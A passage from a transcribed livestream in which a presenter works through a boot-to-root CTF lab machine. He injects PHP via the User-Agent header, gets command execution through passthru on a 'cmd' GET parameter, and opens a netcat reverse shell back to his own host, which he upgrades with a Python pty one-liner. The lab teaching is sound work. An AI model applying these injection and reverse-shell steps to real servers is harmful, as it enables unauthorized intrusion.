faster and with higher confidence levels. So anyways, so what we have here is a PHP page that is also reflecting data back to us. If we refresh, it looks like we've still got the cross-site scripting in there. So we're obviously getting reflected back to us, but this is a PHP page, which is interesting because, and we might be able to do this. Now, I'm not a PHP guy, but so this might get a little bit sloppy. Oops. Started another one. No, go away. Yes, I'm sure I want to exit. Okay, we're going to turn intercept back on, and we're gonna start this up again, and we will modify this to we do PHP. Is PHP print? I think it's print. Or is it echo maybe? Hold on. PHP. See, I'm not a developer, so I always have to look this stuff up. I think it's echo. We do echo hello world. Let's go to the bottom or the top. Maybe it's not echo. Oh, I don't think it's the parentheses. Let's try that again. Oh, you know what? I don't think it. I don't think it works like this. I think it's only showing the stuff that accessed the main site. So let's just erase this real quick. We'll do a normal thing, right? And if you notice, our I just pointed at my screen again. If you notice, it's not showing up here, right? It did down here. This was our viewing it between the Nmap scan and the Nikto, but it's not showing up anything below that. So it's probably us accessing the main page. And if we go here, and we go PHP echo hello world, and then we reload this page, and there's the hello world. So what's interesting about this, what is important about this here, is that we are seeing the result of the PHP statement that we put in, right? We're not seeing the open bracket question mark PHP space, et cetera, et cetera. We're not seeing the code that we put in. We're seeing how that code evaluated, which is pretty cool. So there's a few things we can do with this. Let's turn intercept off real quick so we can do a couple searches. We can do PHP exec. So if you see here, there's these PHP statements called shell exec and pass through. In fact, this is probably a good one to show because it shows you like kind of the different uses of it, right? Displays, whether they display output or how they display output, or do they get an exit code, etc. We can use some of these to help us start executing commands on the system, as long as that system is evaluating PHP and sending it back to us, which it appears that it is. So if we do something silly like we'll how do I want to do this? Should we use curl? Let's use curl. We've been using a lot of GUI tools through this practice, so let's use curl. Curl is, for those that do not know, curl is a Linux command line HTTP client kind of thing. It stands for CURL, which is like a C library. get on Steam? I don't even see Steam running. Was that Steam? Weird. I don't know how that happened. Oh yeah, there it is. Okay. Anyways, so we can do something like curl http 192.168.47131, and we'll get the code here. Yeah. So curl will get the page, but since it's not a browser, it's not going to render the page like your browser will do. What is the Ubuntu icon on the bottom left? Oh, yeah. So this is a VMware workstation with Kali running in it. This is my Windows taskbar. So this is Bash for Windows is all it is. Usually I actually have this, thanks for reminding me, I usually have this full screened so that it's more like a regular computer. So anyways, and if we look here, man, this 5 minutes has been going on for a really long time. Is this not working maybe? But if you look, here's our curl user agent. That's the default user agent. But we can change that because curl is super handy and powerful. So if we do curl with a capital H, we can set our own headers. I believe user agent is like that. We'll say we can edit stuff. And HTTP 2168 47131. Let's do a refresh here. And we can edit stuff. So we can inject our own stuff through curl. So now we know two ways of doing this. We can use a curl statement and set our own user agent header, or we can turn on like an intercepting proxy like burp or zap and edit it as we submit the stuff. So just for repetitive sake, we're going to be able to hit up and enter. We're going to use curl. And we're going to PHP. What was one of the things that we found? Let's use pass-through for grins. And so there is a thing in PHP where it can actually grab stuff from the URL. Like if you use a get, you can set up these variables to pull stuff. So if you set it, I think it's like this: PHP get variable. Yeah. So like that, and then if we call it command or CMD for command, and this should work. So if we go back and we do this, CMD equals ls, or let's do ID. Scroll down to the bottom. Oop. Pass-through expects parameter 1 to be string. Array given in. Interesting. You can see here, it's like, don't do this. This is super scary. It's bad. Pass through get. And there's a whole article right here about doing stuff like this. So full disclosure, I usually use like shell or shell exec here. Who the hell is this? What? What? How now? There's another one. Okay. Fair enough. Do we need to put string command? PHP shell pass through. Is it a semicolon? Am I just always like just forever missing semicolons? It's always those damn semicolons. Every time. No, it's still mad. You were wrong, sir. Oh, do I have to echo it? No, it's still mad. Okay, well, let's do it the way that I usually do it instead. Or maybe I should get this working though. Oh wait. Am I just being super stupid? Or what about what is happening? Oh man. Place CMD with ls. You mean replace the hmm. Oh, no, I don't think that's the way it works. I think it's setting a variable. We can try it though. You mean like do this? No, because that's the point of the getting the get variable here. If we just wanted to do that, right? If we just wanted to user bin ID, and then yeah, so you can just like one at a time send a curl command and then check it, send a curl command, check it to do this. However, there's a way, and I'm trying to figure out why it's not working here, but there's a way to essentially set you basically set a variable, the CMD or whatever you want it to be, to where you can do this kind of a thing, right? Though I'm not sure why it's not working. But I guess it doesn't really matter. If we can do this, then that's pretty much all we need, because we are going to get ourselves a shell. So we're going to set up a listener using Netcat. So Netcat, we're going to listen on port, let's say 443. And whoop. We're gonna bin nc 192.168. What is my IP address? This guy. And then we're going to hit that on 443. We're going to execute bin bash when we do that. So what this is doing is Netcat is sort of like just a network Swiss Army knife. I can set up sockets or whatever, like listening ports and whatnot. So here I said, just open up port 443 and listen on it. What I'm about to do here is on this machine, using the PHP pass-through, I'm going to use Netcat again, but this time I'm just saying, hey, connect to this machine, which is me. This is the Kali box on port 443. But what you're going to do when you do that is actually shovel bin bash back to it. So let's see if this works. So we put that there. We reload. And now we have a shell. So what's interesting to know is two things. One, this is going for a while. This is going to go forever because it's currently executing this Netcat. If I quit out of it, then it finishes the loading. Okay. So that whole time it was hanging because it was still it was loading that Netcat or running that Netcat. So if we do it again, let's set up our listener again and run it. And we can run ID. Okay. So now we know that we're running as just the www-data user, which that means that the thing that is executing, the user that is executing our Netcat listener is actually the web server itself. It is the one processing the PHP code that this PHP code here that did the pass-through command for us. So we've got our shell here. And we can start poking around if we wanted to. So, we can run, let's see, I wouldn't run sudo -l as www, but it's something that you'd think about, right? As like if you're a regular interactive user, sudo -l. Well, what happened there? We're not getting any output. We are not currently in what is actually an interactive shell. We're just kind of in this half-life of a shell, this less than alive shell, right? So there's a thing that we can do, a little Python. Yeah, we don't have TTY. There's a thing that we can do using Python or a variety of other methods to actually get us into an interactive shell. And so what we're going to do here is we're just going to do a little Python one-liner where we're going to import pty, and then we're going to do pty spawn. Actually, I'm sorry, I think we need to do this double quotes. Import pty, then we're going to pty spawn bin bash. And here we are. We're at an interactive shell now. We don't have the cool bash stuff like tab complete. We can get that. That's a little more, it's something that I've done in the past. It involves like backgrounding your process, and then you have to disable echo or something like that. Basically, there's weird technical reasons why you don't get tab complete, but honestly, it doesn't really matter to me that much, so we're not going to go into it. Maybe I'll look up, refigure out how to do that, and then we can do a broadcast on it or something. But for now, we're in our shell. We don't have the password for this because it doesn't have a password. Yeah. Okay. But let's start doing some enumeration. Let's start looking around and kind of seeing what we can do. The first thing we should do, and I'm going to intentionally go a specific route. There's two ways that I found how to route this box. One of them is very apparent when you see it, so we're not going to do that first. We're going to kind of take a little journey first, and then we'll go back to the more apparent one, or maybe less apparent. I'm not sure. So what we will do is let's go to home and see who exists. CTF user has its own directory. And it looks like we've got some, that's funny. This is from, this must be from when I did it last time. So if we, this is why I should clean stuff up before before I do these broadcasts. Let's hope for a buffer overflow. No buffer overflows today. I do a buffer overflow in the Lord of the Root boot to root. And the next CTF that I'm gonna, or the boot to root that I'm gonna be doing was a request to do a boot to root called Hades. Evidently, there's some reverse engineering and buffer overflowing there. That is way out of my wheelhouse, so I'm going to be learning a lot doing that one, and hopefully pass that learning on to you. But for now, let's look at a much more common way to priv-esc through enumeration, and it's let's take a look at let's see, cron.d. lsr cron star. Oh no, that's why. What happened? Something happened to this box. Do I take the time and do I take the time and like reset the box to re-import it? Do I have it? Hold on. Yeah, North Korea got in. They got my boot to root, man. Okay, here's what I'm gonna do. I'm gonna take a 5-minute break and get the. I'm gonna reset the boot to root back to stock, and then get back to where we are now. And when I come back from break, we can get going again. Just because I want things to be relatively seamless when I upload it to YouTube. So just give me a couple minutes, and I'll be back.